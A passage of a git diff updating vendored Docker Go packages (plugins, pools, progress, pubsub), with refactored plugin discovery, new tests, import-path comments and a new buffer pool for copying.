+	c, _ := NewClientWithTimeout(addr, &tlsconfig.Options{InsecureSkipVerify: true}, timeout)
+	var output Manifest
+	err := c.Call("Test.Echo", m, &output)
+	if err == nil {
+		t.Fatal("Expected timeout error")
+	}
+}
+
+func TestClientStream(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}}
+	var output Manifest
+
+	mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != "POST" {
+			t.Fatalf("Expected POST, got %s", r.Method)
+		}
+
+		header := w.Header()
+		header.Set("Content-Type", transport.VersionMimetype)
+
+		io.Copy(w, r.Body)
+	})
+
+	c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true})
+	body, err := c.Stream("Test.Echo", m)
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer body.Close()
+	if err := json.NewDecoder(body).Decode(&output); err != nil {
+		t.Fatalf("Test.Echo: error reading plugin resp: %v", err)
+	}
+	assert.Check(t, is.DeepEqual(m, output))
+}
+
+func TestClientSendFile(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	m := Manifest{[]string{"VolumeDriver", "NetworkDriver"}}
+	var output Manifest
+	var buf bytes.Buffer
+	if err := json.NewEncoder(&buf).Encode(m); err != nil {
+		t.Fatal(err)
+	}
+	mux.HandleFunc("/Test.Echo", func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != "POST" {
+			t.Fatalf("Expected POST, got %s\n", r.Method)
+		}
+
+		header := w.Header()
+		header.Set("Content-Type", transport.VersionMimetype)
+
+		io.Copy(w, r.Body)
+	})
+
+	c, _ := NewClient(addr, &tlsconfig.Options{InsecureSkipVerify: true})
+	if err := c.SendFile("Test.Echo", &buf, &output); err != nil {
+		t.Fatal(err)
+	}
+	assert.Check(t, is.DeepEqual(m, output))
+}
+
+func TestClientWithRequestTimeout(t *testing.T) {
+	timeout := 1 * time.Millisecond
+	testHandler := func(w http.ResponseWriter, r *http.Request) {
+		time.Sleep(timeout + 1*time.Millisecond)
+		w.WriteHeader(http.StatusOK)
+	}
+
+	srv := httptest.NewServer(http.HandlerFunc(testHandler))
+	defer srv.Close()
+
+	client := &Client{http: srv.Client(), requestFactory: &testRequestWrapper{srv}}
+	_, err := client.callWithRetry("/Plugin.Hello", nil, false, WithRequestTimeout(timeout))
+	assert.Assert(t, is.ErrorContains(err, ""), "expected error")
+
+	err = errors.Cause(err)
+
+	switch e := err.(type) {
+	case *url.Error:
+		err = e.Err
+	}
+	assert.DeepEqual(t, context.DeadlineExceeded, err)
+}
+
+type testRequestWrapper struct {
+	*httptest.Server
+}
+
+func (w *testRequestWrapper) NewRequest(path string, data io.Reader) (*http.Request, error) {
+	req, err := http.NewRequest("POST", path, data)
+	if err != nil {
+		return nil, err
+	}
+	u, err := url.Parse(w.Server.URL)
+	if err != nil {
+		return nil, err
+	}
+	req.URL = u
+	return req, nil
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery.go b/vendor/github.com/docker/docker/pkg/plugins/discovery.go
index e99581c573..4b79bd29ad 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/discovery.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery.go
@@ -1,8 +1,7 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"encoding/json"
-	"errors"
 	"fmt"
 	"io/ioutil"
 	"net/url"
@@ -10,6 +9,8 @@ import (
 	"path/filepath"
 	"strings"
 	"sync"
+
+	"github.com/pkg/errors"
 )
 
 var (
@@ -28,30 +29,52 @@ func newLocalRegistry() localRegistry {
 // Scan scans all the plugin paths and returns all the names it found
 func Scan() ([]string, error) {
 	var names []string
-	if err := filepath.Walk(socketsPath, func(path string, fi os.FileInfo, err error) error {
-		if err != nil {
-			return nil
+	dirEntries, err := ioutil.ReadDir(socketsPath)
+	if err != nil && !os.IsNotExist(err) {
+		return nil, errors.Wrap(err, "error reading dir entries")
+	}
+
+	for _, fi := range dirEntries {
+		if fi.IsDir() {
+			fi, err = os.Stat(filepath.Join(socketsPath, fi.Name(), fi.Name()+".sock"))
+			if err != nil {
+				continue
+			}
 		}
 
 		if fi.Mode()&os.ModeSocket != 0 {
-			name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name()))
-			names = append(names, name)
+			names = append(names, strings.TrimSuffix(filepath.Base(fi.Name()), filepath.Ext(fi.Name())))
 		}
-		return nil
-	}); err != nil {
-		return nil, err
 	}
 
-	for _, path := range specsPaths {
-		if err := filepath.Walk(path, func(p string, fi os.FileInfo, err error) error {
-			if err != nil || fi.IsDir() {
-				return nil
+	for _, p := range specsPaths {
+		dirEntries, err := ioutil.ReadDir(p)
+		if err != nil && !os.IsNotExist(err) {
+			return nil, errors.Wrap(err, "error reading dir entries")
+		}
+
+		for _, fi := range dirEntries {
+			if fi.IsDir() {
+				infos, err := ioutil.ReadDir(filepath.Join(p, fi.Name()))
+				if err != nil {
+					continue
+				}
+
+				for _, info := range infos {
+					if strings.TrimSuffix(info.Name(), filepath.Ext(info.Name())) == fi.Name() {
+						fi = info
+						break
+					}
+				}
+			}
+
+			ext := filepath.Ext(fi.Name())
+			switch ext {
+			case ".spec", ".json":
+				plugin := strings.TrimSuffix(fi.Name(), ext)
+				names = append(names, plugin)
+			default:
 			}
-			name := strings.TrimSuffix(fi.Name(), filepath.Ext(fi.Name()))
-			names = append(names, name)
-			return nil
-		}); err != nil {
-			return nil, err
 		}
 	}
 	return names, nil
@@ -81,7 +104,7 @@ func (l *localRegistry) Plugin(name string) (*Plugin, error) {
 			return readPluginInfo(name, p)
 		}
 	}
-	return nil, ErrNotFound
+	return nil, errors.Wrapf(ErrNotFound, "could not find plugin %s in v1 plugin registry", name)
 }
 
 func readPluginInfo(name, path string) (*Plugin, error) {
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
index 03f9d00319..28fda41bad 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_test.go
@@ -1,4 +1,4 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"io/ioutil"
@@ -66,7 +66,7 @@ func TestFileSpecPlugin(t *testing.T) {
 			t.Fatalf("Expected plugin addr `%s`, got %s\n", c.addr, p.Addr)
 		}
 
-		if p.TLSConfig.InsecureSkipVerify != true {
+		if !p.TLSConfig.InsecureSkipVerify {
 			t.Fatalf("Expected TLS verification to be skipped")
 		}
 	}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
index 693a47e394..58058f2828 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix.go
@@ -1,5 +1,5 @@
 // +build !windows
 
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 var specsPaths = []string{"/etc/docker/plugins", "/usr/lib/docker/plugins"}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
index 3e2d506b97..b4aefc83e4 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_unix_test.go
@@ -1,14 +1,17 @@
 // +build !windows
 
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"fmt"
+	"io/ioutil"
 	"net"
 	"os"
 	"path/filepath"
 	"reflect"
 	"testing"
+
+	"gotest.tools/assert"
 )
 
 func TestLocalSocket(t *testing.T) {
@@ -53,9 +56,104 @@ func TestLocalSocket(t *testing.T) {
 		if p.Addr != addr {
 			t.Fatalf("Expected plugin addr `%s`, got %s\n", addr, p.Addr)
 		}
-		if p.TLSConfig.InsecureSkipVerify != true {
+		if !p.TLSConfig.InsecureSkipVerify {
 			t.Fatalf("Expected TLS verification to be skipped")
 		}
 		l.Close()
 	}
 }
+
+func TestScan(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	pluginNames, err := Scan()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if pluginNames != nil {
+		t.Fatal("Plugin names should be empty.")
+	}
+
+	path := filepath.Join(tmpdir, "echo.spec")
+	addr := "unix://var/lib/docker/plugins/echo.sock"
+	name := "echo"
+
+	err = os.MkdirAll(filepath.Dir(path), 0755)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	err = ioutil.WriteFile(path, []byte(addr), 0644)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	r := newLocalRegistry()
+	p, err := r.Plugin(name)
+	assert.NilError(t, err)
+
+	pluginNamesNotEmpty, err := Scan()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(pluginNamesNotEmpty) != 1 {
+		t.Fatalf("expected 1 plugin entry: %v", pluginNamesNotEmpty)
+	}
+	if p.Name() != pluginNamesNotEmpty[0] {
+		t.Fatalf("Unable to scan plugin with name %s", p.name)
+	}
+}
+
+func TestScanNotPlugins(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	// not that `Setup()` above sets the sockets path and spec path dirs, which
+	// `Scan()` uses to find plugins to the returned `tmpdir`
+
+	notPlugin := filepath.Join(tmpdir, "not-a-plugin")
+	if err := os.MkdirAll(notPlugin, 0700); err != nil {
+		t.Fatal(err)
+	}
+
+	// this is named differently than the dir it's in, so the scanner should ignore it
+	l, err := net.Listen("unix", filepath.Join(notPlugin, "foo.sock"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer l.Close()
+
+	// same let's test a spec path
+	f, err := os.Create(filepath.Join(notPlugin, "foo.spec"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+
+	names, err := Scan()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(names) != 0 {
+		t.Fatalf("expected no plugins, got %v", names)
+	}
+
+	// Just as a sanity check, let's make an entry that the scanner should read
+	f, err = os.Create(filepath.Join(notPlugin, "not-a-plugin.spec"))
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer f.Close()
+
+	names, err = Scan()
+	if err != nil {
+		t.Fatal(err)
+	}
+	if len(names) != 1 {
+		t.Fatalf("expected 1 entry in result: %v", names)
+	}
+	if names[0] != "not-a-plugin" {
+		t.Fatalf("expected plugin named `not-a-plugin`, got: %s", names[0])
+	}
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
index d7c1fe4942..f0af3477f4 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/discovery_windows.go
@@ -1,4 +1,4 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"os"
diff --git a/vendor/github.com/docker/docker/pkg/plugins/errors.go b/vendor/github.com/docker/docker/pkg/plugins/errors.go
index 7988471026..6735c304bf 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/errors.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/errors.go
@@ -1,4 +1,4 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"fmt"
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
index b19c0d52f1..ce98078f87 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugin_test.go
@@ -1,12 +1,26 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
-	"errors"
+	"bytes"
+	"encoding/json"
+	"io"
+	"io/ioutil"
+	"net/http"
 	"path/filepath"
 	"runtime"
 	"sync"
 	"testing"
 	"time"
+
+	"github.com/docker/docker/pkg/plugins/transport"
+	"github.com/docker/go-connections/tlsconfig"
+	"github.com/pkg/errors"
+	"gotest.tools/assert"
+)
+
+const (
+	fruitPlugin     = "fruit"
+	fruitImplements = "apple"
 )
 
 // regression test for deadlock in handlers
@@ -40,5 +54,101 @@ func testActive(t *testing.T, p *Plugin) {
 		t.Fatalf("%s:%d: deadlock in waitActive", filepath.Base(f), l)
 	case <-done:
 	}
+}
+
+func TestGet(t *testing.T) {
+	p := &Plugin{name: fruitPlugin, activateWait: sync.NewCond(&sync.Mutex{})}
+	p.Manifest = &Manifest{Implements: []string{fruitImplements}}
+	storage.plugins[fruitPlugin] = p
+
+	plugin, err := Get(fruitPlugin, fruitImplements)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if p.Name() != plugin.Name() {
+		t.Fatalf("No matching plugin with name %s found", plugin.Name())
+	}
+	if plugin.Client() != nil {
+		t.Fatal("expected nil Client but found one")
+	}
+	if !plugin.IsV1() {
+		t.Fatal("Expected true for V1 plugin")
+	}
+
+	// check negative case where plugin fruit doesn't implement banana
+	_, err = Get("fruit", "banana")
+	assert.Equal(t, errors.Cause(err), ErrNotImplements)
+
+	// check negative case where plugin vegetable doesn't exist
+	_, err = Get("vegetable", "potato")
+	assert.Equal(t, errors.Cause(err), ErrNotFound)
+}
+
+func TestPluginWithNoManifest(t *testing.T) {
+	addr := setupRemotePluginServer()
+	defer teardownRemotePluginServer()
+
+	m := Manifest{[]string{fruitImplements}}
+	var buf bytes.Buffer
+	if err := json.NewEncoder(&buf).Encode(m); err != nil {
+		t.Fatal(err)
+	}
+
+	mux.HandleFunc("/Plugin.Activate", func(w http.ResponseWriter, r *http.Request) {
+		if r.Method != "POST" {
+			t.Fatalf("Expected POST, got %s\n", r.Method)
+		}
 
+		header := w.Header()
+		header.Set("Content-Type", transport.VersionMimetype)
+
+		io.Copy(w, &buf)
+	})
+
+	p := &Plugin{
+		name:         fruitPlugin,
+		activateWait: sync.NewCond(&sync.Mutex{}),
+		Addr:         addr,
+		TLSConfig:    &tlsconfig.Options{InsecureSkipVerify: true},
+	}
+	storage.plugins[fruitPlugin] = p
+
+	plugin, err := Get(fruitPlugin, fruitImplements)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if p.Name() != plugin.Name() {
+		t.Fatalf("No matching plugin with name %s found", plugin.Name())
+	}
+}
+
+func TestGetAll(t *testing.T) {
+	tmpdir, unregister := Setup(t)
+	defer unregister()
+
+	p := filepath.Join(tmpdir, "example.json")
+	spec := `{
+	"Name": "example",
+	"Addr": "https://example.com/docker/plugin"
+}`
+
+	if err := ioutil.WriteFile(p, []byte(spec), 0644); err != nil {
+		t.Fatal(err)
+	}
+
+	r := newLocalRegistry()
+	plugin, err := r.Plugin("example")
+	if err != nil {
+		t.Fatal(err)
+	}
+	plugin.Manifest = &Manifest{Implements: []string{"apple"}}
+	storage.plugins["example"] = plugin
+
+	fetchedPlugins, err := GetAll("apple")
+	if err != nil {
+		t.Fatal(err)
+	}
+	if fetchedPlugins[0].Name() != plugin.Name() {
+		t.Fatalf("Expected to get plugin with name %s", plugin.Name())
+	}
 }
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
index 0418a3e00a..5f6a421f19 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/README.md
@@ -30,7 +30,7 @@ Where:
 - `--type` is the name of the interface to use
 - `--name` is the subsystem that the plugin "Implements"
 - `-i` is the input file containing the interface definition
-- `-o` is the output file where the the generated code should go
+- `-o` is the output file where the generated code should go
 
 **Note**: The generated code will use the same package name as the one defined in the input file
 
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
index 5695dcc2d4..d27e28ebef 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/foo.go
@@ -1,17 +1,11 @@
-package foo
+package foo // import "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures"
 
 import (
-	"fmt"
-
 	aliasedio "io"
 
 	"github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture"
 )
 
-var (
-	errFakeImport = fmt.Errorf("just to import fmt for imports tests")
-)
-
 type wobble struct {
 	Some      string
 	Val       string
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
index 1937d1786c..c603f6778c 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture/spaceship.go
@@ -1,4 +1,4 @@
-package otherfixture
+package otherfixture // import "github.com/docker/docker/pkg/plugins/pluginrpc-gen/fixtures/otherfixture"
 
 // Spaceship is a fixture for tests
 type Spaceship struct{}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
index a1b1ac9567..fe7fa5ade6 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/pluginrpc-gen/parser_test.go
@@ -136,7 +136,7 @@ func TestParseWithMultipleFuncs(t *testing.T) {
 	}
 }
 
-func TestParseWithUnamedReturn(t *testing.T) {
+func TestParseWithUnnamedReturn(t *testing.T) {
 	_, err := Parse(testFixture, "Fooer4")
 	if !strings.HasSuffix(err.Error(), errBadReturn.Error()) {
 		t.Fatalf("expected ErrBadReturn, got %v", err)
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins.go b/vendor/github.com/docker/docker/pkg/plugins/plugins.go
index c0059cba75..6962079df9 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/plugins.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins.go
@@ -20,17 +20,20 @@
 //	if err != nil {
 //		return fmt.Errorf("Error looking up volume plugin example: %v", err)
 //	}
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
 import (
 	"errors"
 	"sync"
 	"time"
 
-	"github.com/Sirupsen/logrus"
 	"github.com/docker/go-connections/tlsconfig"
+	"github.com/sirupsen/logrus"
 )
 
+// ProtocolSchemeHTTPV1 is the name of the protocol used for interacting with plugins using this package.
+const ProtocolSchemeHTTPV1 = "moby.plugins.http/v1"
+
 var (
 	// ErrNotImplements is returned if the plugin does not implement the requested driver.
 	ErrNotImplements = errors.New("Plugin does not implement the requested driver")
@@ -88,6 +91,11 @@ func (p *Plugin) Client() *Client {
 	return p.client
 }
 
+// Protocol returns the protocol name/version used for plugins in this package.
+func (p *Plugin) Protocol() string {
+	return ProtocolSchemeHTTPV1
+}
+
 // IsV1 returns true for V1 plugins and false otherwise.
 func (p *Plugin) IsV1() bool {
 	return true
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
deleted file mode 100644
index 9c5a0b5632..0000000000
--- a/vendor/github.com/docker/docker/pkg/plugins/plugins_linux.go
+++ /dev/null
@@ -1,7 +0,0 @@
-package plugins
-
-// BasePath returns the path to which all paths returned by the plugin are relative to.
-// For v1 plugins, this always returns the host's root directory.
-func (p *Plugin) BasePath() string {
-	return "/"
-}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go
new file mode 100644
index 0000000000..cdfbe93458
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_unix.go
@@ -0,0 +1,9 @@
+// +build !windows
+
+package plugins // import "github.com/docker/docker/pkg/plugins"
+
+// ScopedPath returns the path scoped to the plugin's rootfs.
+// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host.
+func (p *Plugin) ScopedPath(s string) string {
+	return s
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
index 3c8d8feb83..ddf1d786c6 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/plugins_windows.go
@@ -1,8 +1,7 @@
-package plugins
+package plugins // import "github.com/docker/docker/pkg/plugins"
 
-// BasePath returns the path to which all paths returned by the plugin are relative to.
-// For Windows v1 plugins, this returns an empty string, since the plugin is already aware
-// of the absolute path of the mount.
-func (p *Plugin) BasePath() string {
-	return ""
+// ScopedPath returns the path scoped to the plugin's rootfs.
+// For v1 plugins, this always returns the path unchanged as v1 plugins run directly on the host.
+func (p *Plugin) ScopedPath(s string) string {
+	return s
 }
diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go
index 5be146af65..76d3bdb712 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/transport/http.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http.go
@@ -1,4 +1,4 @@
-package transport
+package transport // import "github.com/docker/docker/pkg/plugins/transport"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go
new file mode 100644
index 0000000000..78ab23724b
--- /dev/null
+++ b/vendor/github.com/docker/docker/pkg/plugins/transport/http_test.go
@@ -0,0 +1,21 @@
+package transport // import "github.com/docker/docker/pkg/plugins/transport"
+
+import (
+	"io"
+	"net/http"
+	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
+)
+
+func TestHTTPTransport(t *testing.T) {
+	var r io.Reader
+	roundTripper := &http.Transport{}
+	newTransport := NewHTTPTransport(roundTripper, "http", "0.0.0.0")
+	request, err := newTransport.NewRequest("", r)
+	if err != nil {
+		t.Fatal(err)
+	}
+	assert.Check(t, is.Equal("POST", request.Method))
+}
diff --git a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
index d7f1e2100c..9cb13335a8 100644
--- a/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
+++ b/vendor/github.com/docker/docker/pkg/plugins/transport/transport.go
@@ -1,4 +1,4 @@
-package transport
+package transport // import "github.com/docker/docker/pkg/plugins/transport"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/pools/pools.go b/vendor/github.com/docker/docker/pkg/pools/pools.go
index 5c5aead698..46339c282f 100644
--- a/vendor/github.com/docker/docker/pkg/pools/pools.go
+++ b/vendor/github.com/docker/docker/pkg/pools/pools.go
@@ -7,7 +7,7 @@
 //
 // Utility functions which operate on pools should be added to this
 // package to allow them to be reused.
-package pools
+package pools // import "github.com/docker/docker/pkg/pools"
 
 import (
 	"bufio"
@@ -17,15 +17,16 @@ import (
 	"github.com/docker/docker/pkg/ioutils"
 )
 
+const buffer32K = 32 * 1024
+
 var (
 	// BufioReader32KPool is a pool which returns bufio.Reader with a 32K buffer.
 	BufioReader32KPool = newBufioReaderPoolWithSize(buffer32K)
 	// BufioWriter32KPool is a pool which returns bufio.Writer with a 32K buffer.
 	BufioWriter32KPool = newBufioWriterPoolWithSize(buffer32K)
+	buffer32KPool      = newBufferPoolWithSize(buffer32K)
 )
 
-const buffer32K = 32 * 1024
-
 // BufioReaderPool is a bufio reader that uses sync.Pool.
 type BufioReaderPool struct {
 	pool sync.Pool
@@ -54,11 +55,31 @@ func (bufPool *BufioReaderPool) Put(b *bufio.Reader) {
 	bufPool.pool.Put(b)
 }
 
+type bufferPool struct {
+	pool sync.Pool
+}
+
+func newBufferPoolWithSize(size int) *bufferPool {
+	return &bufferPool{
+		pool: sync.Pool{
+			New: func() interface{} { return make([]byte, size) },
+		},
+	}
+}
+
+func (bp *bufferPool) Get() []byte {
+	return bp.pool.Get().([]byte)
+}
+
+func (bp *bufferPool) Put(b []byte) {
+	bp.pool.Put(b)
+}
+
 // Copy is a convenience wrapper which uses a buffer to avoid allocation in io.Copy.
 func Copy(dst io.Writer, src io.Reader) (written int64, err error) {
-	buf := BufioReader32KPool.Get(src)
-	written, err = io.Copy(dst, buf)
-	BufioReader32KPool.Put(buf)
+	buf := buffer32KPool.Get()
+	written, err = io.CopyBuffer(dst, src, buf)
+	buffer32KPool.Put(buf)
 	return
 }
 
diff --git a/vendor/github.com/docker/docker/pkg/pools/pools_test.go b/vendor/github.com/docker/docker/pkg/pools/pools_test.go
index 1661b780c9..7ff01ce3d5 100644
--- a/vendor/github.com/docker/docker/pkg/pools/pools_test.go
+++ b/vendor/github.com/docker/docker/pkg/pools/pools_test.go
@@ -1,4 +1,4 @@
-package pools
+package pools // import "github.com/docker/docker/pkg/pools"
 
 import (
 	"bufio"
@@ -6,6 +6,9 @@ import (
 	"io"
 	"strings"
 	"testing"
+
+	"gotest.tools/assert"
+	is "gotest.tools/assert/cmp"
 )
 
 func TestBufioReaderPoolGetWithNoReaderShouldCreateOne(t *testing.T) {
@@ -92,22 +95,16 @@ func TestBufioWriterPoolPutAndGet(t *testing.T) {
 	buf := new(bytes.Buffer)
 	bw := bufio.NewWriter(buf)
 	writer := BufioWriter32KPool.Get(bw)
-	if writer == nil {
-		t.Fatalf("BufioReaderPool should not return a nil writer.")
-	}
+	assert.Assert(t, writer != nil)
+
 	written, err := writer.Write([]byte("foobar"))
-	if err != nil {
-		t.Fatal(err)
-	}
-	if written != 6 {
-		t.Fatalf("Should have written 6 bytes, but wrote %v bytes", written)
-	}
+	assert.NilError(t, err)
+	assert.Check(t, is.Equal(6, written))
+
 	// Make sure we Flush all the way ?
 	writer.Flush()
 	bw.Flush()
-	if len(buf.Bytes()) != 6 {
-		t.Fatalf("The buffer should contain 6 bytes ('foobar') but contains %v ('%v')", buf.Bytes(), string(buf.Bytes()))
-	}
+	assert.Check(t, is.Len(buf.Bytes(), 6))
 	// Reset the buffer
 	buf.Reset()
 	BufioWriter32KPool.Put(writer)
@@ -159,3 +156,8 @@ func TestNewWriteCloserWrapperWithAWriteCloser(t *testing.T) {
 		t.Fatalf("The ReaderCloser should have been closed, it is not.")
 	}
 }
+
+func TestBufferPoolPutAndGet(t *testing.T) {
+	buf := buffer32KPool.Get()
+	buffer32KPool.Put(buf)
+}
diff --git a/vendor/github.com/docker/docker/pkg/progress/progress.go b/vendor/github.com/docker/docker/pkg/progress/progress.go
index fcf31173cf..9aea591954 100644
--- a/vendor/github.com/docker/docker/pkg/progress/progress.go
+++ b/vendor/github.com/docker/docker/pkg/progress/progress.go
@@ -1,4 +1,4 @@
-package progress
+package progress // import "github.com/docker/docker/pkg/progress"
 
 import (
 	"fmt"
@@ -16,6 +16,11 @@ type Progress struct {
 	Current int64
 	Total   int64
 
+	// If true, don't show xB/yB
+	HideCounts bool
+	// If not empty, use units instead of bytes for counts
+	Units string
+
 	// Aux contains extra information not presented to the user, such as
 	// digests for push signing.
 	Aux interface{}
diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader.go b/vendor/github.com/docker/docker/pkg/progress/progressreader.go
index 6b3927eecf..7ca07dc640 100644
--- a/vendor/github.com/docker/docker/pkg/progress/progressreader.go
+++ b/vendor/github.com/docker/docker/pkg/progress/progressreader.go
@@ -1,4 +1,4 @@
-package progress
+package progress // import "github.com/docker/docker/pkg/progress"
 
 import (
 	"io"
diff --git a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
index b14d401561..e7081cc1f4 100644
--- a/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
+++ b/vendor/github.com/docker/docker/pkg/progress/progressreader_test.go
@@ -1,4 +1,4 @@
-package progress
+package progress // import "github.com/docker/docker/pkg/progress"
 
 import (
 	"bytes"
@@ -14,7 +14,7 @@ func TestOutputOnPrematureClose(t *testing.T) {
 
 	pr := NewProgressReader(reader, ChanOutput(progressChan), int64(len(content)), "Test", "Read")
 
-	part := make([]byte, 4, 4)
+	part := make([]byte, 4)
 	_, err := io.ReadFull(pr, part)
 	if err != nil {
 		pr.Close()
diff --git a/vendor/github.com/docker/docker/pkg/promise/promise.go b/vendor/github.com/docker/docker/pkg/promise/promise.go
deleted file mode 100644
index dd52b9082f..0000000000
--- a/vendor/github.com/docker/docker/pkg/promise/promise.go
+++ /dev/null
@@ -1,11 +0,0 @@
-package promise
-
-// Go is a basic promise implementation: it wraps calls a function in a goroutine,
-// and returns a channel which will later return the function's return value.
-func Go(f func() error) chan error {
-	ch := make(chan error, 1)
-	go func() {
-		ch <- f()
-	}()
-	return ch
-}
diff --git a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go
index 09364617e4..76033ed9e4 100644
--- a/vendor/github.com/docker/docker/pkg/pubsub/publisher.go
+++ b/vendor/github.com/docker/docker/pkg/pubsub/publisher.go
@@ -1,4 +1,4 @@
-package pubsub
+package pubsub // import "github.com/docker/docker/pkg/pubsub"
 
 import (
 	"sync"
@@ -53,6 +53,16 @@ func (p *Publisher) SubscribeTopic(topic topicFunc) chan interface{} {
 	return ch
 }
 
+// SubscribeTopicWithBuffer adds a new subscriber that filters messages sent by a topic.
